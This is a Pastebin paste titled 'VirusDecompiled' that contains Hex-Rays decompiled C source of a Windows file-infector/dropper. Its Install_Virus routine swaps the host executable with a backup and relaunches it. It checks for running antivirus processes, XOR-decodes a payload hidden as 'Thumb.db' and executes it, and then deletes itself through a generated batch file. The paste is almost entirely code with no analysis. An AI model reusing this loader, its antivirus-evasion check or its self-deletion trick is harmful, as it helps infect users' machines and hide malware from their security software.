API tools faq
paste
Guest User

VirusDecompiled

a guest
Nov 23rd, 2012
11
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.30 KB | None | 0 0
raw download clone embed print report
  1. /* This file has been generated by the Hex-Rays decompiler.
  2. Copyright (c) 2009 Hex-Rays <[email protected]>
  3.  
  4. Detected compiler: Visual C++
  5. */
  6.  
  7. #include <windows.h>
  8. #include <defs.h>
  9.  
  10.  
  11. //-------------------------------------------------------------------------
  12. // Data declarations
  13.  
  14. // extern void *CDialog__messageMap; weak
  15. // extern void *CWinApp__messageMap; weak
  16. extern int (*off_402220)(); // weak
  17. extern int (*off_402300)(); // weak
  18. extern int (*off_402350)(); // weak
  19. extern char Operation[]; // idb
  20. extern char aDelFQ0[]; // idb
  21. extern char aIfExistSGotoSt[]; // idb
  22. extern char aDelFQS[]; // idb
  23. extern char aStart[]; // idb
  24. extern char Mode[]; // idb
  25. extern char Format[]; // idb
  26. extern char aWb[]; // idb
  27. extern char aRb[]; // idb
  28. extern char FileName[]; // idb
  29. extern char ApplicationName[]; // idb
  30. extern char aFshoster32_exe[]; // idb
  31. extern char aFprottray_exe[]; // idb
  32. extern char aBdagent_exe[]; // idb
  33. extern char aAvp_exe[]; // idb
  34. extern char aMsmpeng_exe[]; // idb
  35. extern char String1[]; // idb
  36. extern char aBak[]; // idb
  37. extern char String2[]; // idb
  38.  
  39. //-------------------------------------------------------------------------
  40. // Function declarations
  41.  
  42. #define __thiscall __cdecl // Test compile in C mode
  43.  
  44. void *__cdecl sub_401000();
  45. int (**__cdecl sub_401010())();
  46. void *__thiscall sub_401040(void *this, char a2);
  47. int CWinApp___CWinApp(void); // weak
  48. int __thiscall sub_4010B0(void *this);
  49. int __thiscall CDialog___CDialog(_DWORD); // weak
  50. void *__thiscall sub_401150(void *this, int a2);
  51. void *__thiscall sub_4011C0(void *this, char a2);
  52. void *__cdecl sub_4011F0();
  53. int (**__cdecl sub_401200())();
  54. signed int __thiscall sub_401210(void *this);
  55. BOOL __thiscall sub_401330(int this);
  56. BOOL __thiscall sub_401340(int this);
  57. int __cdecl sub_401350(LPCSTR lpFileName); // idb
  58. void *__cdecl sub_401390(int a1);
  59. signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3);
  60. int __cdecl ProcessExists(LPCSTR lpString1); // idb
  61. void *__cdecl Install_Virus();
  62. // void __cdecl operator delete(void *); idb
  63. // int __thiscall CDialog___CDialog(_DWORD); weak
  64. // int __thiscall CDialog__DoModal(_DWORD); weak
  65. // int __thiscall CDialog__OnOK(_DWORD); weak
  66. // struct HINSTANCE__ *__stdcall AfxFindResourceHandle(const char *, const char *); idb
  67. // int AfxGetModuleState(void); weak
  68. // int __stdcall CDialog__CDialog(_DWORD, _DWORD); weak
  69. // int CDialog__OnInitDialog(void); weak
  70. // int _CxxFrameHandler(void); weak
  71. int __cdecl sub_401C22();
  72. // BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
  73. // BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
  74. // HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
  75. // int __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); idb
  76. // int __usercall sub_401CB0<eax>(int a1<ebp>);
  77. int __cdecl SEH_4010B0();
  78. // int __usercall sub_401CD0<eax>(int a1<ebp>);
  79. int __cdecl SEH_401150();
  80. // BOOL __stdcall CloseHandle(HANDLE hObject);
  81. // HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
  82. // LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
  83. // UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
  84. // UINT __stdcall SetErrorMode(UINT uMode);
  85. // int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
  86. // BOOL __stdcall DeleteFileA(LPCSTR lpFileName);
  87. // BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
  88. // LPSTR __stdcall GetCommandLineA();
  89. // void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo);
  90. // BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
  91. // LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
  92. // int __stdcall lstrlenA(LPCSTR lpString);
  93. // DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize);
  94. // DWORD __stdcall GetLastError();
  95. // _DWORD __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); weak
  96. // size_t __cdecl fread(void *DstBuf, size_t ElementSize, size_t Count, FILE *File);
  97. // size_t __cdecl fwrite(const void *Str, size_t Size, size_t Count, FILE *File);
  98. // int sprintf(char *Dest, const char *Format, ...);
  99. // FILE *__cdecl fopen(const char *Filename, const char *Mode);
  100. // int fprintf(FILE *File, const char *Format, ...);
  101. // int __cdecl fclose(FILE *File);
  102. // HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
  103. // BOOL __stdcall EnableWindow(HWND hWnd, BOOL bEnable);
  104. // HICON __stdcall LoadIconA(HINSTANCE hInstance, LPCSTR lpIconName);
  105. // LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
  106.  
  107.  
  108. //----- (00401000) --------------------------------------------------------
  109. void *__cdecl sub_401000()
  110. {
  111. return CWinApp__messageMap;
  112. }
  113. // 402184: using guessed type void *CWinApp__messageMap;
  114.  
  115. //----- (00401010) --------------------------------------------------------
  116. int (**__cdecl sub_401010())()
  117. {
  118. return &off_402220;
  119. }
  120. // 402220: using guessed type int (*off_402220)();
  121.  
  122. //----- (00401040) --------------------------------------------------------
  123. void *__thiscall sub_401040(void *this, char a2)
  124. {
  125. void *v2; // esi@1
  126.  
  127. v2 = this;
  128. CWinApp___CWinApp();
  129. if ( a2 & 1 )
  130. operator delete(v2);
  131. return v2;
  132. }
  133. // 401060: using guessed type int CWinApp___CWinApp(void);
  134.  
  135. //----- (004010B0) --------------------------------------------------------
  136. int __thiscall sub_4010B0(void *this)
  137. {
  138. void *v2; // esi@1
  139. char v3; // [sp+4h] [bp-70h]@1
  140. int v4; // [sp+70h] [bp-4h]@1
  141.  
  142. v2 = this;
  143. sub_401150(&v3, 0);
  144. v4 = 0;
  145. *((_DWORD *)v2 + 8) = &v3;
  146. CDialog__DoModal(&v3);
  147. v4 = -1;
  148. CDialog___CDialog(&v3);
  149. return 0;
  150. }
  151. // 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  152. // 401970: using guessed type int __thiscall CDialog__DoModal(_DWORD);
  153.  
  154. //----- (00401150) --------------------------------------------------------
  155. void *__thiscall sub_401150(void *this, int a2)
  156. {
  157. void *v3; // esi@1
  158. HINSTANCE v4; // eax@1
  159.  
  160. v3 = this;
  161. CDialog__CDialog(102, a2);
  162. *(_DWORD *)v3 = &off_402350;
  163. AfxGetModuleState();
  164. v4 = AfxFindResourceHandle((const char *)0x80, (const char *)0xE);
  165. *((_DWORD *)v3 + 24) = LoadIconA(v4, (LPCSTR)0x80);
  166. return v3;
  167. }
  168. // 401A30: using guessed type int AfxGetModuleState(void);
  169. // 401A36: using guessed type int __stdcall CDialog__CDialog(_DWORD, _DWORD);
  170. // 402350: using guessed type int (*off_402350)();
  171.  
  172. //----- (004011C0) --------------------------------------------------------
  173. void *__thiscall sub_4011C0(void *this, char a2)
  174. {
  175. void *v2; // esi@1
  176.  
  177. v2 = this;
  178. CDialog___CDialog(this);
  179. if ( a2 & 1 )
  180. operator delete(v2);
  181. return v2;
  182. }
  183. // 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  184.  
  185. //----- (004011F0) --------------------------------------------------------
  186. void *__cdecl sub_4011F0()
  187. {
  188. return CDialog__messageMap;
  189. }
  190. // 40212C: using guessed type void *CDialog__messageMap;
  191.  
  192. //----- (00401200) --------------------------------------------------------
  193. int (**__cdecl sub_401200())()
  194. {
  195. return &off_402300;
  196. }
  197. // 402300: using guessed type int (*off_402300)();
  198.  
  199. //----- (00401210) --------------------------------------------------------
  200. signed int __thiscall sub_401210(void *this)
  201. {
  202. void *v2; // esi@1
  203.  
  204. v2 = this;
  205. CDialog__OnInitDialog();
  206. SendMessageA(*((HWND *)v2 + 8), 128u, 1u, *((_DWORD *)v2 + 24));
  207. SendMessageA(*((HWND *)v2 + 8), 0x80u, 0, *((_DWORD *)v2 + 24));
  208. Install_Virus();
  209. CDialog__OnOK(v2);
  210. return 1;
  211. }
  212. // 401982: using guessed type int __thiscall CDialog__OnOK(_DWORD);
  213. // 401A3C: using guessed type int CDialog__OnInitDialog(void);
  214.  
  215. //----- (00401330) --------------------------------------------------------
  216. BOOL __thiscall sub_401330(int this)
  217. {
  218. return EnableWindow(*(HWND *)(this + 32), 0);
  219. }
  220.  
  221. //----- (00401340) --------------------------------------------------------
  222. BOOL __thiscall sub_401340(int this)
  223. {
  224. return EnableWindow(*(HWND *)(this + 32), 1);
  225. }
  226.  
  227. //----- (00401350) --------------------------------------------------------
  228. signed int __cdecl sub_401350(LPCSTR lpFileName)
  229. {
  230. HANDLE v1; // esi@1
  231. signed int result; // eax@3
  232.  
  233. v1 = CreateFileA(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0);
  234. if ( v1 != (HANDLE)-1 || GetLastError() != 2 )
  235. {
  236. CloseHandle(v1);
  237. result = 1;
  238. }
  239. else
  240. {
  241. result = 0;
  242. }
  243. return result;
  244. }
  245.  
  246. //----- (00401390) --------------------------------------------------------
  247. void *__cdecl sub_401390(int a1)
  248. {
  249. int v1; // esi@1
  250. int v2; // ST18_4@2
  251. void *result; // eax@3
  252. FILE *v4; // esi@3
  253. CHAR File; // [sp+8h] [bp-208h]@1
  254. char v6; // [sp+9h] [bp-207h]@1
  255. __int16 v7; // [sp+109h] [bp-107h]@1
  256. char v8; // [sp+10Bh] [bp-105h]@1
  257. CHAR String2; // [sp+10Ch] [bp-104h]@1
  258. char v10; // [sp+10Dh] [bp-103h]@1
  259. __int16 v11; // [sp+20Dh] [bp-3h]@1
  260. char v12; // [sp+20Fh] [bp-1h]@1
  261.  
  262. String2 = 0;
  263. memset(&v10, 0, 0x100u);
  264. v11 = 0;
  265. v12 = 0;
  266. File = 0;
  267. memset(&v6, 0, 0x100u);
  268. v7 = 0;
  269. v1 = 0;
  270. v8 = 0;
  271. SetErrorMode(1u);
  272. GetWindowsDirectoryA(&String2, 0x104u);
  273. lstrcpyA(&File, &String2);
  274. do
  275. {
  276. v2 = v1++;
  277. sprintf(&File, "%s\\temp\\temp%d.bat", &String2, v2);
  278. }
  279. while ( sub_401350(&File) );
  280. result = fopen(&File, L"w");
  281. v4 = (FILE *)result;
  282. if ( result )
  283. {
  284. ((void (__cdecl *)(void *, _DWORD))fprintf)(result, ":start\r\n");
  285. fprintf(v4, "del /f /q \"%s\"\r\n", a1);
  286. fprintf(v4, "if exist \"%s\" goto start\r\n", a1);
  287. fprintf(v4, "del /f /q %%0\r\n");
  288. fclose(v4);
  289. result = ShellExecuteA(0, "open", &File, 0, 0, 0);
  290. }
  291. return result;
  292. }
  293.  
  294. //----- (004014B0) --------------------------------------------------------
  295. signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3)
  296. {
  297. FILE *v3; // esi@1
  298. FILE *v4; // ebx@2
  299. size_t i; // eax@3
  300. signed int j; // ecx@4
  301. char DstBuf[1024]; // [sp+Ch] [bp-400h]@3
  302.  
  303. v3 = fopen(Filename, "rb");
  304. if ( !v3 )
  305. return 0;
  306. v4 = fopen(a2, "wb");
  307. if ( !v4 )
  308. {
  309. fclose(v3);
  310. return 0;
  311. }
  312. memset(DstBuf, 0, sizeof(DstBuf));
  313. for ( i = fread(DstBuf, 1u, 0x400u, v3); i; i = fread(DstBuf, 1u, 0x400u, v3) )
  314. {
  315. for ( j = 0; j < (signed int)i; ++j )
  316. DstBuf[j] ^= a3;
  317. fwrite(DstBuf, i, 1u, v4);
  318. memset(DstBuf, 0, sizeof(DstBuf));
  319. }
  320. fclose(v3);
  321. fclose(v4);
  322. return 1;
  323. }
  324. // 4014B0: using guessed type char DstBuf[1024];
  325.  
  326. //----- (004015A0) --------------------------------------------------------
  327. signed int __cdecl ProcessExists(LPCSTR lpString1)
  328. {
  329. DWORD v1; // ebp@1
  330. HANDLE v2; // esi@1
  331. signed int result; // eax@7
  332. PROCESSENTRY32 pe; // [sp+8h] [bp-128h]@1
  333.  
  334. v1 = -1;
  335. pe.dwSize = 296;
  336. v2 = CreateToolhelp32Snapshot(2u, 0);
  337. if ( v2 )
  338. {
  339. if ( Process32First(v2, &pe) )
  340. {
  341. if ( lstrcmpiA(lpString1, pe.szExeFile) )
  342. {
  343. while ( Process32Next(v2, &pe) )
  344. {
  345. if ( !lstrcmpiA(lpString1, pe.szExeFile) )
  346. goto LABEL_6;
  347. }
  348. }
  349. else
  350. {
  351. LABEL_6:
  352. v1 = pe.th32ProcessID;
  353. }
  354. }
  355. CloseHandle(v2);
  356. result = v1;
  357. }
  358. else
  359. {
  360. result = -1;
  361. }
  362. return result;
  363. }
  364.  
  365. //----- (00401630) --------------------------------------------------------
  366. void *__cdecl Install_Virus()
  367. {
  368. int v0; // eax@1
  369. int v1; // eax@6
  370. CHAR *v2; // eax@11
  371. struct _PROCESS_INFORMATION ProcessInformation; // [sp+10h] [bp-360h]@11
  372. struct _STARTUPINFOA StartupInfo; // [sp+20h] [bp-350h]@11
  373. CHAR String; // [sp+64h] [bp-30Ch]@1
  374. char v7[259]; // [sp+65h] [bp-30Bh]@1
  375. CHAR ExistingFileName; // [sp+168h] [bp-208h]@1
  376. char v9[259]; // [sp+169h] [bp-207h]@1
  377. CHAR String2; // [sp+26Ch] [bp-104h]@1
  378. char v11; // [sp+26Dh] [bp-103h]@1
  379. __int16 v12; // [sp+36Dh] [bp-3h]@1
  380. char v13; // [sp+36Fh] [bp-1h]@1
  381.  
  382. String2 = 0;
  383. String = 0;
  384. memset(&v11, 0, 0x100u);
  385. v12 = 0;
  386. v13 = 0;
  387. ExistingFileName = 0;
  388. memset(v7, 0, 0x100u);
  389. *(_WORD *)&v7[256] = 0;
  390. v7[258] = 0;
  391. memset(v9, 0, 0x100u);
  392. *(_WORD *)&v9[256] = 0;
  393. v9[258] = 0;
  394. GetModuleFileNameA(0, &String2, 0x104u);
  395. lstrcpyA(&String, &String2);
  396. lstrcpyA(&ExistingFileName, &String2);
  397. v0 = lstrlenA(&String) - 1;
  398. if ( v0 >= 0 )
  399. {
  400. while ( *(&String + v0) != 92 )
  401. {
  402. --v0;
  403. if ( v0 < 0 )
  404. goto LABEL_6;
  405. }
  406. v7[v0] = 0;
  407. }
  408. LABEL_6:
  409. lstrcatA(&String, "tmp.tmp");
  410. MoveFileA(&String2, &String);
  411. v1 = lstrlenA(&ExistingFileName) - 1;
  412. if ( v1 >= 0 )
  413. {
  414. while ( *(&ExistingFileName + v1) != 46 )
  415. {
  416. --v1;
  417. if ( v1 < 0 )
  418. goto LABEL_11;
  419. }
  420. v9[v1] = 0;
  421. }
  422. LABEL_11:
  423. lstrcatA(&ExistingFileName, "bak");
  424. MoveFileA(&ExistingFileName, &String2);
  425. StartupInfo.cb = 0;
  426. memset(&StartupInfo.lpReserved, 0, 0x40u);
  427. ProcessInformation.hThread = 0;
  428. ProcessInformation.hProcess = 0;
  429. ProcessInformation.dwProcessId = 0;
  430. ProcessInformation.dwThreadId = 0;
  431. GetStartupInfoA(&StartupInfo);
  432. v2 = GetCommandLineA();
  433. CreateProcessA(&String2, v2, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  434. if ( ProcessExists("ccsvchst.exe") == -1 )
  435. {
  436. if ( ProcessExists("MsMpEng.exe") == -1 )
  437. {
  438. if ( ProcessExists("avp.exe") == -1 )
  439. {
  440. if ( ProcessExists("bdagent.exe") == -1 )
  441. {
  442. if ( ProcessExists("FProtTray.exe") == -1 )
  443. {
  444. if ( ProcessExists("fshoster32.exe") == -1 )
  445. {
  446. GetStartupInfoA(&StartupInfo);
  447. if ( sub_4014B0("Thumb.db", "Thumb.db.tmp", -86) )
  448. CreateProcessA("Thumb.db.tmp", 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
  449. }
  450. }
  451. }
  452. }
  453. }
  454. }
  455. DeleteFileA("Thumb.db");
  456. return sub_401390((int)&String);
  457. }
  458. // 401630: using guessed type char var_30B[259];
  459. // 401630: using guessed type char var_207[259];
  460.  
  461. //----- (00401C22) --------------------------------------------------------
  462. int __cdecl sub_401C22()
  463. {
  464. return 0;
  465. }
  466.  
  467. //----- (00401CB0) --------------------------------------------------------
  468. int __usercall sub_401CB0<eax>(int a1<ebp>)
  469. {
  470. return CDialog___CDialog(a1 - 112);
  471. }
  472. // 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  473.  
  474. //----- (00401CB8) --------------------------------------------------------
  475. int __cdecl SEH_4010B0()
  476. {
  477. return _CxxFrameHandler();
  478. }
  479. // 401A92: using guessed type int _CxxFrameHandler(void);
  480.  
  481. //----- (00401CD0) --------------------------------------------------------
  482. int __usercall sub_401CD0<eax>(int a1<ebp>)
  483. {
  484. return CDialog___CDialog(*(_DWORD *)(a1 - 16));
  485. }
  486. // 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  487.  
  488. //----- (00401CD8) --------------------------------------------------------
  489. int __cdecl SEH_401150()
  490. {
  491. return _CxxFrameHandler();
  492. }
  493. // 401A92: using guessed type int _CxxFrameHandler(void);
  494.  
  495. // ALL OK, 21 function(s) have been successfully decompiled
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!